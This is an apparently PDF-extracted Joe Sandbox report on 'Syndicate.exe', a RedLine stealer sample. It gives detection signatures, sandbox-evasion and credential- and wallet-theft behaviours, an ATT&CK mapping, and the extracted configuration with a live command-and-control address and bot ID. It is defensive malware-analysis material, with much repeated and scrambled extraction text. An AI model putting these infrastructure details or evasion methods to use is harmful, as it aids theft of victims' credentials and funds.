table of contents 2 windows analysis report syndicate.exe 4
TRANSCRIPT
ID: 453870Sample Name: Syndicate.exeCookbook: default.jbsTime: 11:45:12Date: 25/07/2021Version: 33.0.0 White Diamond
2444444444444555555555666667788888899
10101010101010111111111111111221212121212122222222222222
222222222223232325
Table of Contents
Table of ContentsWindows Analysis Report Syndicate.exe
OverviewGeneral InformationDetectionSignaturesClassification
Process TreeMalware Configuration
Threatname: RedLineYara Overview
PCAP (Network Traffic)Memory DumpsUnpacked PEs
Sigma OverviewJbx Signature Overview
AV Detection:Networking:System Summary:Data Obfuscation:Hooking and other Techniques for Hiding and Protection:Malware Analysis System Evasion:Anti Debugging:Stealing of Sensitive Information:Remote Access Functionality:
Mitre Att&ck MatrixBehavior GraphScreenshots
ThumbnailsAntivirus, Machine Learning and Genetic Malware Detection
Initial SampleDropped FilesUnpacked PE FilesDomainsURLs
Domains and IPsContacted DomainsContacted URLsURLs from Memory and BinariesContacted IPsPublicPrivate
General InformationSimulations
Behavior and APIsJoe Sandbox View / Context
IPsDomainsASNJA3 FingerprintsDropped Files
Created / dropped FilesStatic File Info
GeneralFile IconStatic PE Info
GeneralAuthenticode SignatureEntrypoint PreviewData DirectoriesSectionsResourcesImportsVersion InfosPossible Origin
Network BehaviorNetwork Port DistributionTCP PacketsUDP PacketsDNS QueriesDNS AnswersHTTP Request Dependency GraphHTTP Packets
Code Manipulations
Copyright Joe Security LLC 2021 Page 2 of 27
25252525252525252525
26
2626
26262626
262627
2727
StatisticsBehavior
System BehaviorAnalysis Process: Syndicate.exe PID: 4900 Parent PID: 5696
GeneralFile Activities
File CreatedFile DeletedFile WrittenFile Read
Registry Activities
Analysis Process: conhost.exe PID: 4196 Parent PID: 4900General
Analysis Process: GameBarPresenceWriter.exe PID: 5920 Parent PID: 792GeneralRegistry Activities
Key Created
Analysis Process: GameBar.exe PID: 5572 Parent PID: 792GeneralRegistry Activities
DisassemblyCode Analysis
Copyright Joe Security LLC 2021 Page 3 of 27
Windows Analysis Report Syndicate.exe
Overview
General Information
Sample Name:
Syndicate.exe
Analysis ID: 453870
MD5: 1ca3d04a1c28f57…
SHA1: 30a0a21660c49c…
SHA256: 196e6323c5ffd21…
Tags: exe
Infos:
Most interesting Screenshot:
Detection
RedLineRedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus / Scanner detection for sub
Antivirus / Scanner detection for sub
Antivirus / Scanner detection for sub
Antivirus / Scanner detection for sub
Antivirus / Scanner detection for sub
Antivirus / Scanner detection for sub
Antivirus / Scanner detection for subAntivirus / Scanner detection for sub……
Detected unpacking (changes PE se
Detected unpacking (changes PE se
Detected unpacking (changes PE se
Detected unpacking (changes PE se
Detected unpacking (changes PE se
Detected unpacking (changes PE se
Detected unpacking (changes PE seDetected unpacking (changes PE se……
Found malware configuration
Found malware configuration
Found malware configuration
Found malware configuration
Found malware configuration
Found malware configuration
Found malware configurationFound malware configuration
Multi AV Scanner detection for subm
Multi AV Scanner detection for subm
Multi AV Scanner detection for subm
Multi AV Scanner detection for subm
Multi AV Scanner detection for subm
Multi AV Scanner detection for subm
Multi AV Scanner detection for submMulti AV Scanner detection for subm……
Yara detected RedLine Stealer
Yara detected RedLine Stealer
Yara detected RedLine Stealer
Yara detected RedLine Stealer
Yara detected RedLine Stealer
Yara detected RedLine Stealer
Yara detected RedLine StealerYara detected RedLine Stealer
Yara detected RedLine Stealer
Yara detected RedLine Stealer
Yara detected RedLine Stealer
Yara detected RedLine Stealer
Yara detected RedLine Stealer
Yara detected RedLine Stealer
Yara detected RedLine StealerYara detected RedLine Stealer
Hides threads from debuggers
Hides threads from debuggers
Hides threads from debuggers
Hides threads from debuggers
Hides threads from debuggers
Hides threads from debuggers
Hides threads from debuggersHides threads from debuggers
Machine Learning detection for samp
Machine Learning detection for samp
Machine Learning detection for samp
Machine Learning detection for samp
Machine Learning detection for samp
Machine Learning detection for samp
Machine Learning detection for sampMachine Learning detection for samp……
PE file contains section with special
PE file contains section with special
PE file contains section with special
PE file contains section with special
PE file contains section with special
PE file contains section with special
PE file contains section with specialPE file contains section with special……
Queries sensitive disk information (v
Queries sensitive disk information (v
Queries sensitive disk information (v
Queries sensitive disk information (v
Queries sensitive disk information (v
Queries sensitive disk information (v
Queries sensitive disk information (vQueries sensitive disk information (v……
Queries sensitive video device inform
Queries sensitive video device inform
Queries sensitive video device inform
Queries sensitive video device inform
Queries sensitive video device inform
Queries sensitive video device inform
Queries sensitive video device informQueries sensitive video device inform……
Query firmware table information (lik
Query firmware table information (lik
Query firmware table information (lik
Query firmware table information (lik
Query firmware table information (lik
Query firmware table information (lik
Query firmware table information (likQuery firmware table information (lik……
Tries to detect sandboxes / dynamic
Tries to detect sandboxes / dynamic
Tries to detect sandboxes / dynamic
Tries to detect sandboxes / dynamic
Tries to detect sandboxes / dynamic
Tries to detect sandboxes / dynamic
Tries to detect sandboxes / dynamicTries to detect sandboxes / dynamic……
Tries to detect sandboxes and other
Tries to detect sandboxes and other
Tries to detect sandboxes and other
Tries to detect sandboxes and other
Tries to detect sandboxes and other
Tries to detect sandboxes and other
Tries to detect sandboxes and otherTries to detect sandboxes and other……
Tries to harvest and steal browser in
Tries to harvest and steal browser in
Tries to harvest and steal browser in
Tries to harvest and steal browser in
Tries to harvest and steal browser in
Tries to harvest and steal browser in
Tries to harvest and steal browser inTries to harvest and steal browser in……
Tries to steal Crypto Currency Wallets
Tries to steal Crypto Currency Wallets
Tries to steal Crypto Currency Wallets
Tries to steal Crypto Currency Wallets
Tries to steal Crypto Currency Wallets
Tries to steal Crypto Currency Wallets
Tries to steal Crypto Currency WalletsTries to steal Crypto Currency Wallets
Uses known network protocols on no
Uses known network protocols on no
Uses known network protocols on no
Uses known network protocols on no
Uses known network protocols on no
Uses known network protocols on no
Uses known network protocols on noUses known network protocols on no……
AV process strings found (often use
AV process strings found (often use
AV process strings found (often use
AV process strings found (often use
AV process strings found (often use
AV process strings found (often use
AV process strings found (often useAV process strings found (often use……
Binary contains a suspicious time st
Binary contains a suspicious time st
Binary contains a suspicious time st
Binary contains a suspicious time st
Binary contains a suspicious time st
Binary contains a suspicious time st
Binary contains a suspicious time stBinary contains a suspicious time st……
Checks if Antivirus/Antispyware/Fire
Checks if Antivirus/Antispyware/Fire
Checks if Antivirus/Antispyware/Fire
Checks if Antivirus/Antispyware/Fire
Checks if Antivirus/Antispyware/Fire
Checks if Antivirus/Antispyware/Fire
Checks if Antivirus/Antispyware/FireChecks if Antivirus/Antispyware/Fire……
Checks if the current process is bein
Checks if the current process is bein
Checks if the current process is bein
Checks if the current process is bein
Checks if the current process is bein
Checks if the current process is bein
Checks if the current process is beinChecks if the current process is bein……
Contains capabilities to detect virtua
Contains capabilities to detect virtua
Contains capabilities to detect virtua
Contains capabilities to detect virtua
Contains capabilities to detect virtua
Contains capabilities to detect virtua
Contains capabilities to detect virtuaContains capabilities to detect virtua……
Contains long sleeps (>= 3 min)
Contains long sleeps (>= 3 min)
Contains long sleeps (>= 3 min)
Contains long sleeps (>= 3 min)
Contains long sleeps (>= 3 min)
Contains long sleeps (>= 3 min)
Contains long sleeps (>= 3 min)Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non
Detected TCP or UDP traffic on non
Detected TCP or UDP traffic on non
Detected TCP or UDP traffic on non
Detected TCP or UDP traffic on non
Detected TCP or UDP traffic on non
Detected TCP or UDP traffic on nonDetected TCP or UDP traffic on non……
Detected potential crypto function
Detected potential crypto function
Detected potential crypto function
Detected potential crypto function
Detected potential crypto function
Detected potential crypto function
Detected potential crypto functionDetected potential crypto function
Enables debug privileges
Enables debug privileges
Enables debug privileges
Enables debug privileges
Enables debug privileges
Enables debug privileges
Enables debug privilegesEnables debug privileges
Entry point lies outside standard sec
Entry point lies outside standard sec
Entry point lies outside standard sec
Entry point lies outside standard sec
Entry point lies outside standard sec
Entry point lies outside standard sec
Entry point lies outside standard secEntry point lies outside standard sec……
Found a high number of Window / Us
Found a high number of Window / Us
Found a high number of Window / Us
Found a high number of Window / Us
Found a high number of Window / Us
Found a high number of Window / Us
Found a high number of Window / UsFound a high number of Window / Us……
HTTP GET or POST without a user
HTTP GET or POST without a user
HTTP GET or POST without a user
HTTP GET or POST without a user
HTTP GET or POST without a user
HTTP GET or POST without a user
HTTP GET or POST without a user HTTP GET or POST without a user ……
IP address seen in connection with o
IP address seen in connection with o
IP address seen in connection with o
IP address seen in connection with o
IP address seen in connection with o
IP address seen in connection with o
IP address seen in connection with oIP address seen in connection with o……
Internet Provider seen in connection
Internet Provider seen in connection
Internet Provider seen in connection
Internet Provider seen in connection
Internet Provider seen in connection
Internet Provider seen in connection
Internet Provider seen in connectionInternet Provider seen in connection……
Is looking for software installed on th
Is looking for software installed on th
Is looking for software installed on th
Is looking for software installed on th
Is looking for software installed on th
Is looking for software installed on th
Is looking for software installed on thIs looking for software installed on th……
May sleep (evasive loops) to hinder
May sleep (evasive loops) to hinder
May sleep (evasive loops) to hinder
May sleep (evasive loops) to hinder
May sleep (evasive loops) to hinder
May sleep (evasive loops) to hinder
May sleep (evasive loops) to hinder May sleep (evasive loops) to hinder ……
PE / OLE file has an invalid certificate
PE / OLE file has an invalid certificate
PE / OLE file has an invalid certificate
PE / OLE file has an invalid certificate
PE / OLE file has an invalid certificate
PE / OLE file has an invalid certificate
PE / OLE file has an invalid certificatePE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains an invalid checksum
PE file contains an invalid checksum
PE file contains an invalid checksum
PE file contains an invalid checksum
PE file contains an invalid checksum
PE file contains an invalid checksumPE file contains an invalid checksum
PE file contains sections with non-s
PE file contains sections with non-s
PE file contains sections with non-s
PE file contains sections with non-s
PE file contains sections with non-s
PE file contains sections with non-s
PE file contains sections with non-sPE file contains sections with non-s……
Queries sensitive processor informa
Queries sensitive processor informa
Queries sensitive processor informa
Queries sensitive processor informa
Queries sensitive processor informa
Queries sensitive processor informa
Queries sensitive processor informaQueries sensitive processor informa……
Queries the volume information (nam
Queries the volume information (nam
Queries the volume information (nam
Queries the volume information (nam
Queries the volume information (nam
Queries the volume information (nam
Queries the volume information (namQueries the volume information (nam……
Sample file is different than original
Sample file is different than original
Sample file is different than original
Sample file is different than original
Sample file is different than original
Sample file is different than original
Sample file is different than original Sample file is different than original ……
Uses 32bit PE files
Uses 32bit PE files
Uses 32bit PE files
Uses 32bit PE files
Uses 32bit PE files
Uses 32bit PE files
Uses 32bit PE filesUses 32bit PE files
Uses code obfuscation techniques (
Uses code obfuscation techniques (
Uses code obfuscation techniques (
Uses code obfuscation techniques (
Uses code obfuscation techniques (
Uses code obfuscation techniques (
Uses code obfuscation techniques (Uses code obfuscation techniques (……
Yara detected Credential Stealer
Yara detected Credential Stealer
Yara detected Credential Stealer
Yara detected Credential Stealer
Yara detected Credential Stealer
Yara detected Credential Stealer
Yara detected Credential StealerYara detected Credential Stealer
Classification
Ransomware
Spreading
Phishing
Banker
Trojan / Bot
Adware
Spyware
Exploiter
Evader
Miner
clean
clean
clean
clean
clean
clean
clean
suspicious
suspicious
suspicious
suspicious
suspicious
suspicious
suspicious
malicious
malicious
malicious
malicious
malicious
malicious
malicious
System is w10x64
Syndicate.exe (PID: 4900 cmdline: 'C:\Users\user\Desktop\Syndicate.exe' MD5: 1CA3D04A1C28F573E0A31C49881C8C4A)
conhost.exe (PID: 4196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
GameBarPresenceWriter.exe (PID: 5920 cmdline: 'C:\Windows\System32\GameBarPresenceWriter.exe' -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
MD5: 04FC9C82E4D082B728D3337D75043690)GameBar.exe (PID: 5572 cmdline: 'C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_1.15.1001.0_x64__8wekyb3d8bbwe\GameBar.exe' -ServerName:App.Ap
pXbdkk0yrkwpcgeaem8zk81k8py1eaahny.mca MD5: 754FD02CE495D5A4C90D6539727319EA)cleanup
{
"C2 url": [
"65.21.103.71:56458"
],
"Bot Id": "fs3"
}
Source Rule Description Author Strings
dump.pcap JoeSecurity_RedLine_1 Yara detected RedLine Stealer
Joe Security
Source Rule Description Author Strings
00000001.00000003.200580397.0000000001C70000.00000004.00000001.sdmp
JoeSecurity_RedLine Yara detected RedLine Stealer
Joe Security
Process Tree
Malware Configuration
Threatname: RedLine
Yara Overview
PCAP (Network Traffic)
Memory Dumps
Copyright Joe Security LLC 2021 Page 4 of 27
Sigma Overview
No Sigma rule has matched
Jbx Signature Overview
Click to jump to signature section
AV Detection:
Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Machine Learning detection for sample
Networking:
Uses known network protocols on non-standard ports
System Summary:
PE file contains section with special chars
Data Obfuscation:
Detected unpacking (changes PE section rights)
Hooking and other Techniques for Hiding and Protection:
Uses known network protocols on non-standard ports
Malware Analysis System Evasion:
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Process Memory Space: Syndicate.exe PID: 4900 JoeSecurity_RedLine Yara detected RedLine Stealer
Joe Security
Process Memory Space: Syndicate.exe PID: 4900 JoeSecurity_RedLine_1 Yara detected RedLine Stealer
Joe Security
Process Memory Space: Syndicate.exe PID: 4900 JoeSecurity_CredentialStealer
Yara detected Credential Stealer
Joe Security
Source Rule Description Author Strings
Source Rule Description Author Strings
1.2.Syndicate.exe.ca0000.0.unpack JoeSecurity_RedLine Yara detected RedLine Stealer
Joe Security
Unpacked PEs
Copyright Joe Security LLC 2021 Page 5 of 27
Anti Debugging:
Hides threads from debuggers
Tries to detect sandboxes and other dynamic analysis tools (window names)
Stealing of Sensitive Information:
Yara detected RedLine Stealer
Yara detected RedLine Stealer
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Remote Access Functionality:
Yara detected RedLine Stealer
Yara detected RedLine Stealer
Mitre Att&ck Matrix
InitialAccess Execution Persistence
PrivilegeEscalation Defense Evasion
CredentialAccess Discovery
LateralMovement Collection Exfiltration
Commandand Control
NetworkEffects
ValidAccounts
Windows ManagementInstrumentation 2 2 1
PathInterception
ProcessInjection 2
Masquerading 1 OSCredentialDumping 1
Security SoftwareDiscovery 6 5
RemoteServices
ArchiveCollectedData 1
ExfiltrationOver OtherNetworkMedium
EncryptedChannel 1
Eavesdrop onInsecureNetworkCommunication
DefaultAccounts
Scheduled Task/Job Boot orLogonInitializationScripts
Boot orLogonInitializationScripts
Disable or ModifyTools 1
LSASSMemory
ProcessDiscovery 1 2
RemoteDesktopProtocol
Data fromLocalSystem 2
ExfiltrationOverBluetooth
Non-StandardPort 1 1
Exploit SS7 toRedirect PhoneCalls/SMS
DomainAccounts
At (Linux) Logon Script(Windows)
LogonScript(Windows)
Virtualization/SandboxEvasion 5 5 1
SecurityAccountManager
Virtualization/SandboxEvasion 5 5 1
SMB/WindowsAdmin Shares
Data fromNetworkSharedDrive
AutomatedExfiltration
Non-ApplicationLayerProtocol 2
Exploit SS7 toTrack DeviceLocation
LocalAccounts
At (Windows) Logon Script(Mac)
LogonScript(Mac)
Process Injection 2 NTDS Application WindowDiscovery 1
DistributedComponentObject Model
InputCapture
ScheduledTransfer
ApplicationLayerProtocol 2
SIM CardSwap
CloudAccounts
Cron NetworkLogon Script
NetworkLogonScript
Obfuscated Files orInformation 2
LSASecrets
Remote SystemDiscovery 1
SSH Keylogging DataTransferSize Limits
FallbackChannels
ManipulateDeviceCommunication
ReplicationThroughRemovableMedia
Launchd Rc.common Rc.common SoftwarePacking 1 2
CachedDomainCredentials
System InformationDiscovery 1 2 4
VNC GUI InputCapture
ExfiltrationOver C2Channel
MultibandCommunication
Jamming orDenial ofService
ExternalRemoteServices
Scheduled Task StartupItems
StartupItems
Timestomp 1 DCSync Network Sniffing WindowsRemoteManagement
WebPortalCapture
ExfiltrationOverAlternativeProtocol
CommonlyUsed Port
Rogue Wi-FiAccess Points
Behavior Graph
Copyright Joe Security LLC 2021 Page 6 of 27
Behavior Graph
ID: 453870
Sample: Syndicate.exe
Startdate: 25/07/2021
Architecture: WINDOWS
Score: 100
Found malware configurationAntivirus / Scanner
detection for submittedsample
Multi AV Scanner detectionfor submitted file 5 other signatures
Syndicate.exe
15 34
started
GameBar.exe
1
started
GameBarPresenceWriter.exe
started
65.21.103.71, 49730, 49733, 56458
CP-ASDE
United States
api.ip.sb
192.168.2.1
unknown
unknown
C:\Users\user\AppData\...\Syndicate.exe.log, ASCII
dropped
Detected unpacking (changesPE section rights)
Queries sensitive videodevice information (via
WMI, Win32_VideoController,often done to detect
virtual machines)
Query firmware tableinformation (likely
to detect VMs)6 other signatures
conhost.exe
started
Legend:
Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet
Hide Legend
ThumbnailsThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
Screenshots
Copyright Joe Security LLC 2021 Page 7 of 27
Source Detection Scanner Label Link
Syndicate.exe 30% Virustotal Browse
Syndicate.exe 100% Avira TR/Crypt.XPACK.Gen
Syndicate.exe 100% Joe Sandbox ML
No Antivirus matches
No Antivirus matches
Source Detection Scanner Label Link
api.ip.sb 2% Virustotal Browse
Source Detection Scanner Label Link
65.21.103.71: 1% Virustotal Browse
Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
Dropped Files
Unpacked PE Files
Domains
URLs
Copyright Joe Security LLC 2021 Page 8 of 27
65.21.103.71: 0% Avira URL Cloud safe
service.r 0% URL Reputation safe
tempuri.org/t_ 0% Avira URL Cloud safe
https://api.ip.sb/geoip 0% URL Reputation safe
tempuri.org/ 2% Virustotal Browse
tempuri.org/ 0% Avira URL Cloud safe
ns.adobe.c/g 0% URL Reputation safe
tempuri.org/Endpoint/SetEnvironment 0% Avira URL Cloud safe
tempuri.org/Endpoint/SetEnvironmentResponse 0% Avira URL Cloud safe
www.sajatypeworks.com 0% URL Reputation safe
tempuri.org/Endpoint/GetUpdates 0% Avira URL Cloud safe
www.founder.com.cn/cn/cThe 0% URL Reputation safe
www.interoperabilitybridges.com/wmp-extension-for-chrome 0% URL Reputation safe
www.galapagosdesign.com/DPlease 0% URL Reputation safe
tempuri.org/Endpoint/VerifyUpdate 0% Avira URL Cloud safe
www.urwpp.deDPlease 0% URL Reputation safe
www.zhongyicts.com.cn 0% URL Reputation safe
support.a 0% URL Reputation safe
65.21.103.71:56458/ 0% Avira URL Cloud safe
ns.adobe.cobj 0% URL Reputation safe
tempuri.org/Endpoint/CheckConnectResponse 0% Avira URL Cloud safe
schemas.datacontract.org/2004/07/ 0% URL Reputation safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE% 0% URL Reputation safe
65.21.103.71:56458 0% Avira URL Cloud safe
65.21.103.71:564584 0% Avira URL Cloud safe
tempuri.org/Endpoint/SetEnviron 0% Avira URL Cloud safe
www.carterandcone.coml 0% URL Reputation safe
forms.rea 0% URL Reputation safe
tempuri.org/Endpoint/EnvironmentSettingsResponse 0% Avira URL Cloud safe
www.founder.com.cn/cn/bThe 0% URL Reputation safe
ocsp.sectigo.com0 0% URL Reputation safe
tempuri.org/Endpoint/EnvironmentSettings 0% Avira URL Cloud safe
www.tiro.com 0% URL Reputation safe
www.goodfont.co.kr 0% URL Reputation safe
tempuri.org/Endpoint/VerifyUpdateResponse 0% Avira URL Cloud safe
go.micros 0% URL Reputation safe
https://sectigo.com/CPS0U 0% URL Reputation safe
www.typography.netD 0% URL Reputation safe
www.galapagosdesign.com/staff/dennis.htm 0% URL Reputation safe
fontfabrik.com 0% URL Reputation safe
https://api.ipify.orgcookies//settinString.Removeg 0% URL Reputation safe
https://sectigo.com/CPS0D 0% URL Reputation safe
tempuri.org/0 0% Avira URL Cloud safe
www.sandoll.co.kr 0% URL Reputation safe
www.sakkal.com 0% URL Reputation safe
https://api.ip.sb4 0% URL Reputation safe
https://helpx.ad 0% URL Reputation safe
tempuri.org/Endpoint/CheckConnect 0% Avira URL Cloud safe
https://get.adob 0% URL Reputation safe
crl.sectigo.com/SectigoRSATimeStampingCA.crl0t 0% URL Reputation safe
www.founder.com.cn/cn 0% URL Reputation safe
crt.sectigo.com/SectigoRSATimeStampingCA.crt0# 0% URL Reputation safe
tempuri.org/Endpoint/GetUpdatesResponse 0% Avira URL Cloud safe
www.jiyu-kobo.co.jp/ 0% URL Reputation safe
ns.ado/1 0% URL Reputation safe
Source Detection Scanner Label Link
Domains and IPs
Contacted Domains
Copyright Joe Security LLC 2021 Page 9 of 27
General Information
Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 453870
Start date: 25.07.2021
Start time: 11:45:12
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 43s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Syndicate.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:
27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabledEGA enabledHDC enabledAMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/29@2/2
EGA Information: Failed
HDC Information: Failed
HCA Information: Failed
Cookbook Comments: Adjust boot timeEnable AMSIFound application associated with file extension: .exe
Warnings:
Name IP Active Malicious Antivirus Detection Reputation
api.ip.sb unknown unknown true 2%, Virustotal, Browse unknown
Name Malicious Antivirus Detection Reputation
65.21.103.71:56458/ true Avira URL Cloud: safe unknown
IP Domain Country Flag ASN ASN Name Malicious
65.21.103.71 unknown United States 199592 CP-ASDE true
IP
192.168.2.1
Contacted URLs
URLs from Memory and Binaries
Contacted IPs
Public
Private
Show All
Simulations
Copyright Joe Security LLC 2021 Page 10 of 27
Time Type Description
11:46:16 API Interceptor 53x Sleep call for process: Syndicate.exe modified
Match Associated Sample Name / URL SHA 256 Detection Link Context
65.21.103.71 RedFlame.exe Get hash malicious Browse 65.21.103.71:56458/
RedFlame.exe Get hash malicious Browse 65.21.103.71:56458/
Collapse.exe Get hash malicious Browse 65.21.103.71:56458/
Collapse.exe Get hash malicious Browse 65.21.103.71:56458/
Collapse.exe Get hash malicious Browse 65.21.103.71:56458/
Collapse.exe Get hash malicious Browse 65.21.103.71:56458/
Collapse.exe Get hash malicious Browse 65.21.103.71:56458/
No context
Match Associated Sample Name / URL SHA 256 Detection Link Context
CP-ASDE RedFlame.exe Get hash malicious Browse 65.21.103.71
RedFlame.exe Get hash malicious Browse 65.21.103.71
F7HNqd2k7K.exe Get hash malicious Browse 65.21.179.142
006mC7Oh77.exe Get hash malicious Browse 65.21.179.142
Collapse.exe Get hash malicious Browse 65.21.103.71
CSyG3zNcwS.exe Get hash malicious Browse 65.21.181.5
BrCi5pJr8J.exe Get hash malicious Browse 65.21.181.5
Collapse.exe Get hash malicious Browse 65.21.103.71
Collapse.exe Get hash malicious Browse 65.21.103.71
Collapse.exe Get hash malicious Browse 65.21.103.71
jnl3kWNWWS.exe Get hash malicious Browse 65.21.126.175
Collapse.exe Get hash malicious Browse 65.21.103.71
4dee972756364c4a670b31004c506161750027588c111.exe Get hash malicious Browse 65.21.122.45
fc8f7aa134b3771bf328e7d5aed9b7bdac2e0794c60a3.exe Get hash malicious Browse 65.21.122.45
RKvaDjOIJz.exe Get hash malicious Browse 65.21.122.45
ETlg6RunFK.exe Get hash malicious Browse 65.21.122.45
16dd8a22b82372491d537d12f0a0574a3756d1a225994.exe Get hash malicious Browse 65.21.122.45
b09e1e3ad712f773066bd497bb61406ff0c3f95746759.exe Get hash malicious Browse 65.21.122.45
ujAvQrTk73.exe Get hash malicious Browse 65.21.179.153
FoQGVXmWdZ.exe Get hash malicious Browse 65.21.93.53
No context
No context
Behavior and APIs
Joe Sandbox View / Context
IPs
Domains
ASN
JA3 Fingerprints
Dropped Files
Copyright Joe Security LLC 2021 Page 11 of 27
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Syndicate.exe.log
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 2502
Entropy (8bit): 5.3347050065951125
Encrypted: false
SSDEEP: 48:MIHKx1qH2HKXRfHK7HKdHKBSTHaAHKzvRYHKhQnoPtHoxHImHKhBHKoHaHZHxLHL:PqxwWqXdq7qdqslqzJYqhQnoPtIxHbqQ
MD5: 9272E66A264F664A151C4A693A140914
SHA1: 31141E3FC38C5212EC068549E559A82D1D5B8F45
SHA-256: 0A658752FB253F23E57AF3E09E195170AF0D70C3BFD1292A8F9EC7ED116C0153
SHA-512: 008F9F89C03A81BE34FBD3E02F3A30C079CED196EEC80E61974D2A647534BF5A47913329E3686811F3C625596FDD4F8A49C5B8C75D42607001C5C1D33FE62220
Malicious: true
Reputation: low
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToke
C:\Users\user\AppData\Local\Temp\tmp46B2.tmpProcess: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: false
Reputation: high, very likely benign file
Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmp46B3.tmpProcess: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: false
Reputation: high, very likely benign file
Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmp7575.tmpProcess: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Created / dropped Files
Copyright Joe Security LLC 2021 Page 12 of 27
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: false
Reputation: high, very likely benign file
Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmp7575.tmp
C:\Users\user\AppData\Local\Temp\tmpA466.tmpProcess: C:\Users\user\Desktop\Syndicate.exe
